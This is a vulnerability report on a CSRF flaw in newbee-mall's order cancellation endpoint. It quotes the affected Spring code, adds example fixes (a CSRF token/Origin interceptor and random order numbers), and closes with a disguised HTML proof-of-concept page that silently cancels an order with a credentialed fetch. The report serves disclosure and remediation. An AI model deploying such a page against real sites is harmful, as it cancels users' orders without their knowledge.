CSRF Vulnerability in Order Cancellation #108

@flashzyc

CSRF Vulnerability in Order Cancellation

Summary

A CSRF vulnerability exists in the order cancellation endpoint /orders/{orderNo}/cancel. Because the endpoint relies on the session cookie alone, a page controlled by an attacker can make an authenticated user's browser cancel that user's legitimate orders without the user's knowledge or consent.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
import ltd.newbee.mall.interceptor.NewBeeMallLoginInterceptor;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Autowired
    private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor; // declared in the full file; elided from the original excerpt
    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor) // only checks that a session user exists
                .addPathPatterns("/orders/**");
        // ❌ No CSRF protection configured
    }
}
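The login interceptor registered above verifies only that a session user exists; it never asks where the request came from, which is exactly what CSRF exploits. The following interceptor is an added example written for this report and is not code from newbee-mall; the class name CsrfInterceptor, its package, the session key CSRF_TOKEN and the header name X-CSRF-TOKEN are assumptions, and it assumes a Spring Boot 2.x / javax.servlet stack. It rejects any state-changing request (PUT, POST, DELETE, PATCH) that fails either of two independent checks: an Origin/Referer allow-list and a per-session synchronizer token that the page must echo in a request header. Note that a cross-origin PUT from fetch is subject to a CORS preflight, so whether the PoC below fires depends on the deployment's CORS policy; the interceptor does not rely on that and refuses cross-site writes regardless.

```java
package ltd.newbee.mall.interceptor; // hypothetical location for this added class

import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashSet;
import java.util.Set;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.web.servlet.HandlerInterceptor;

/**
 * Rejects cross-site state-changing requests with two independent checks:
 * an Origin/Referer allow-list and a per-session synchronizer token that
 * the page's own JavaScript must send back in the X-CSRF-TOKEN header.
 */
public class CsrfInterceptor implements HandlerInterceptor {
    public static final String TOKEN_SESSION_KEY = "CSRF_TOKEN"; // assumed name
    public static final String TOKEN_HEADER = "X-CSRF-TOKEN";    // assumed name
    private static final Set<String> SAFE_METHODS = new HashSet<>(Arrays.asList("GET", "HEAD", "OPTIONS"));
    private static final SecureRandom RNG = new SecureRandom();

    private final Set<String> allowedOrigins; // scheme://host[:port], e.g. "http://localhost:28089"

    public CsrfInterceptor(Set<String> allowedOrigins) {
        this.allowedOrigins = allowedOrigins;
    }

    /** Returns the session's token, minting one on first use; a template renders it into the page. */
    public static String tokenFor(HttpSession session) {
        synchronized (session) {
            String token = (String) session.getAttribute(TOKEN_SESSION_KEY);
            if (token == null) {
                byte[] raw = new byte[32]; // 256 bits from a CSPRNG
                RNG.nextBytes(raw);
                token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
                session.setAttribute(TOKEN_SESSION_KEY, token);
            }
            return token;
        }
    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
            throws IOException {
        if (SAFE_METHODS.contains(request.getMethod().toUpperCase())) {
            return true; // reads are not state-changing; PUT/POST/DELETE/PATCH fall through to the checks
        }
        // Check 1: the browser-supplied Origin (Referer as fallback) must be this site.
        String source = request.getHeader("Origin");
        if (source == null) {
            source = request.getHeader("Referer");
        }
        if (source == null || !allowedOrigins.contains(originOf(source))) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN, "cross-site request rejected");
            return false;
        }
        // Check 2: the synchronizer token; a cross-site page cannot read it, so it cannot echo it.
        HttpSession session = request.getSession(false);
        String expected = session == null ? null : (String) session.getAttribute(TOKEN_SESSION_KEY);
        String presented = request.getHeader(TOKEN_HEADER);
        if (expected == null || presented == null
                || !MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                          presented.getBytes(StandardCharsets.UTF_8))) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN, "missing or invalid CSRF token");
            return false;
        }
        return true;
    }

    /** Reduces "http://host:port/path?x" to "http://host:port"; malformed values (including "null") never match. */
    private static String originOf(String url) {
        try {
            URI u = new URI(url);
            if (u.getScheme() == null || u.getHost() == null) {
                return "";
            }
            return u.getScheme() + "://" + u.getHost() + (u.getPort() == -1 ? "" : ":" + u.getPort());
        } catch (URISyntaxException e) {
            return "";
        }
    }
}
```

Wiring it up takes one more line in addInterceptors, after the login interceptor: `registry.addInterceptor(new CsrfInterceptor(Collections.singleton("http://localhost:28089"))).addPathPatterns("/orders/**");`, with the real deployment origin substituted. The order pages then render `CsrfInterceptor.tokenFor(session)` into a meta tag and the cancel call sends it as `headers: { 'X-CSRF-TOKEN': token }`. As defence in depth, Spring Boot 2.6 and later can also mark the session cookie `server.servlet.session.cookie.same-site=lax`, which keeps browsers from attaching it to cross-site PUT/POST requests at all (assumes the project is on a Boot version that supports the property).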

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/OrderController.java (Lines 85-95)

@PutMapping("/orders/{orderNo}/cancel")
@ResponseBody
public Result cancelOrder(@PathVariable("orderNo") String orderNo, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ orderNo is predictable (timestamp-based)
    String cancelOrderResult = newBeeMallOrderService.cancelOrder(orderNo, user.getUserId());
    if (ServiceResultEnum.SUCCESS.getResult().equals(cancelOrderResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(cancelOrderResult);
    }
}

Security Issues:

  1. ❌ No CSRF token validation
  2. ⚠️ Order numbers are predictable and can be enumerated
  3. ⚠️ No additional confirmation required
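Item 2 widens the impact of item 1: a cross-site page has to name the orderNo it wants cancelled, and a timestamp-based number lets it guess plausible values. The following generator is an added example written for this report, not newbee-mall's own NumberUtil; the class name OpaqueOrderNo, the `yyyyMMdd-` prefix and the 12-character suffix are assumptions, and adopting it assumes the order_no column is a string wide enough for the new format. The suffix carries 60 bits from a CSPRNG, so order numbers cannot be enumerated, while the date prefix keeps them sortable for staff; isWellFormed lets the controller reject malformed values before they reach the service layer.

```java
import java.security.SecureRandom;
import java.time.LocalDate;
import java.time.format.DateTimeFormatter;
import java.util.regex.Pattern;

/** Unguessable order numbers: hypothetical helper, not part of newbee-mall. */
public final class OpaqueOrderNo {
    private static final SecureRandom RNG = new SecureRandom();
    // Crockford-style alphabet without I, L and O so a number can be read back aloud without confusion;
    // 32 symbols = 5 bits per character.
    private static final String ALPHABET = "0123456789ABCDEFGHJKMNPQRSTVWXYZ";
    private static final int SUFFIX_LEN = 12; // 12 * 5 = 60 bits of entropy
    private static final Pattern SHAPE =
            Pattern.compile("\\d{8}-[" + ALPHABET + "]{" + SUFFIX_LEN + "}");

    private OpaqueOrderNo() {}

    /** e.g. "20260205-7K3QZ9WM2XH4" (constructed sample): date prefix for sorting, random suffix for secrecy. */
    public static String generate(LocalDate day) {
        StringBuilder sb = new StringBuilder(day.format(DateTimeFormatter.BASIC_ISO_DATE)).append('-');
        for (int i = 0; i < SUFFIX_LEN; i++) {
            sb.append(ALPHABET.charAt(RNG.nextInt(ALPHABET.length())));
        }
        return sb.toString();
    }

    /** Cheap syntactic check for the path variable before the service or database sees it. */
    public static boolean isWellFormed(String orderNo) {
        return orderNo != null && SHAPE.matcher(orderNo).matches();
    }
}
```

This does not replace the ownership check that cancelOrder(orderNo, user.getUserId()) already performs; that check stops one user cancelling another user's order, while the unguessable number stops a third party from naming a victim's order in the first place. Neither substitutes for the CSRF check on the endpoint itself.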

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Order Status Update</title>
</head>
<body>
    <h2>Checking your recent orders...</h2>
    <div id="status">Please wait...</div>
    
    <script>
        // Target order number (can be enumerated or obtained from order history page)
        var orderNo = '202602051645001';  // Example order number
        
        fetch('http://localhost:28089/orders/' + orderNo + '/cancel', {
            method: 'PUT',
            credentials: 'include'  // Include session cookie
        })
        .then(response => response.json())
        .then(data => {
            document.getElementById('status').innerHTML = 'Update complete!';
        })
        .catch(err => {
            document.getElementById('status').innerHTML = 'Processing...';
        });
    </script>
</body>
</html>

Impact

Malicious order cancellation - Attackers can cancel users' legitimate orders, causing inconvenience and potential business disruption.


CVSS Score: 6.5 (Medium)
